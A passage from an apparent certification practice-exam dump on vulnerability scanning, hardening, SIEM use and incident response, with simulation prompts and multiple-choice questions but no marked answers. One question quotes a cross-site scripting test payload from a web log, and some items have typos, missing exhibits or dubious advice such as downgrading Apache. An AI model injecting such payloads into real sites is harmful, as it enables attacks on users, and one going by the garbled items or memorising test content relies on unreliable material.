vulnerabilities or bugs. AppServ3: Downgrade Apache from version 2.4.19 to version 2.4.18 or lower on this server to ensure compatibility and stability with the company’s applications and policies. Change the port number from 8080 to either port 80 (for HTTP) or port 443 (for HTTPS) on this server to follow the default port convention and avoid any confusion or conflicts with other services. AppServ4: Update Apache from version 2.4.16 to version 2.4.18 or greater on this server to fix any potential vulnerabilities or bugs. Change the port number from 8443 to either port 80 (for HTTP) or port 443 (for HTTPS) on this server to follow the default port convention and avoid any confusion or conflicts with other services. HOTSPOT A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed and if a false positive occurred for each device.Instructions:Select the Results Generated drop-down option to determine if the results were generated from a credentialed scan, non-credentialed scan, or a compliance scan.For ONLY the credentialed and non-credentialed scans, evaluate the results for false positives and check the findings that display false positives. NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server tothe results. The Linux Web Server, File-Print Server and Directory Server are draggable.If at any time you would like to bring back the initial state of the simulation, please select the Reset All button. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue. Critical (10.0) 13852 Microsoft Windows Tesk Scheduler Remote Overflow (841873). Critical (9.3) 08955 Ubuntu 5.04/ 5.10/ 6.06 LTS Buffer overrun in emscrpit before 1.6.4 (CVE-2008-4306). WARNING (1.0.1) System cryptopgraphy:Force strong key protection for user keys stored on the computer: Prompt the user each time a key first used. You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening guidelines indicate the following. There must be one primary server or service per device. Only default port should be used Non- secure protocols should be disabled. The corporate internet presence should be placed in a protected subnet Instructions : Using the available tools, discover devices on the corporate network and the services running on these devices. You must determine ip address of each device The primary server or service each device The protocols that should be disabled based on the hardening guidelines. Ver en PDF. HOTSPOT The developers recently deployed new code to three web servers. A daffy automated external device scan report shows server vulnerabilities that are failure items according to PCI DSS. If the venerability is not valid, the analyst must take the proper steps to get the scan clean. If the venerability is valid, the analyst must remediate the finding. After reviewing the information provided in the network diagram, select the STEP 2 tab to complete the simulation by selecting the correct Validation Result and Remediation Action for each server listed using the drop-down options. Ver PDF. An organization was compromised, and the usernames and passwords of all em-ployees were leaked online. Which of the following best describes the remedia-tion that could reduce the impact of this situation?. Multifactor authentication. Password changes. System hardening. Password encryption. An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?. CIS Benchmarks. PCI DSS. OWASP Top Ten. ISO 27001. Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?. Deploy a database to aggregate the logging. Configure the servers to forward logs to a SIEM. Share the log directory on each server to allow local access,. Automate the emailing of logs to the analysts. Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?. Join an information sharing and analysis center specific to the company's industry. Upload threat intelligence to the IPS in STIX/TAXII format. Add data enrichment for IPS in the ingestion pipleline. Review threat feeds after viewing the SIEM alert. Which of the following best describes the process of requiring remediation of a known threat within a given time frame?. SLA. MOU. Best-effort patching. Organizational governance. A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then concludes the server has been compromised. Which of the following steps should the administrator take next?. Inform the internal incident response team. Follow the company's incident response plan. Review the lessons learned for the best approach. Determine when the access started. A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?. Perform static analyses using an integrated development environment. Deploy compensating controls into the environment. Implement server-side logging and automatic updates. Conduct regular code reviews using OWASP best practices. A security audit for unsecured network services was conducted, and the following output was generated: Which of the following services should the security team investigate further? (Select two). 21. 22. 23. 636. 1723. 3389. While reviewing web server logs, a security analyst found the following line: <IMG SRC=’vbscript:msgbox("test")’> Which of the following malicious activities was attempted?. Command injection. XML injection. Server-side request forgery. Cross-site scripting. Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?. Log retention. Log rotation. Maximum log size. Threshold value. Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?. CASB. DMARC. SIEM. PAM. After completing a review of network activity. the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?. Irregular peer-to-peer communication. Rogue device on the network. Abnormal OS process behavior. Data exfiltration. Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?. Review Of security requirements. Compliance checks. Decomposing the application. Security by design. Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?. TO ensure the report is legally acceptable in case it needs to be presented in court. To present a lessons-learned analysis for the incident response team. To ensure the evidence can be used in a postmortem analysis. To prevent the possible loss of a data source for further root cause analysis. A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?. Help desk. Law enforcement. Legal department. Board member. Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system, application, or user base is affected by an uptime availability outage?. Timeline. Evidence. Impact. Scope. An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?. False positive. True negative. False negative. True positive. A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication. Which of the following does this most likely describe?. System hardening. Hybrid network architecture. Continuous authorization. Secure access service edge. A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach the network and remain inside of it for an extended period of time.Which of the following techniques should be performed to meet the CISO's goals?. Vulnerability scanning. Adversary emulation. Passive discovery. Bug bounty. |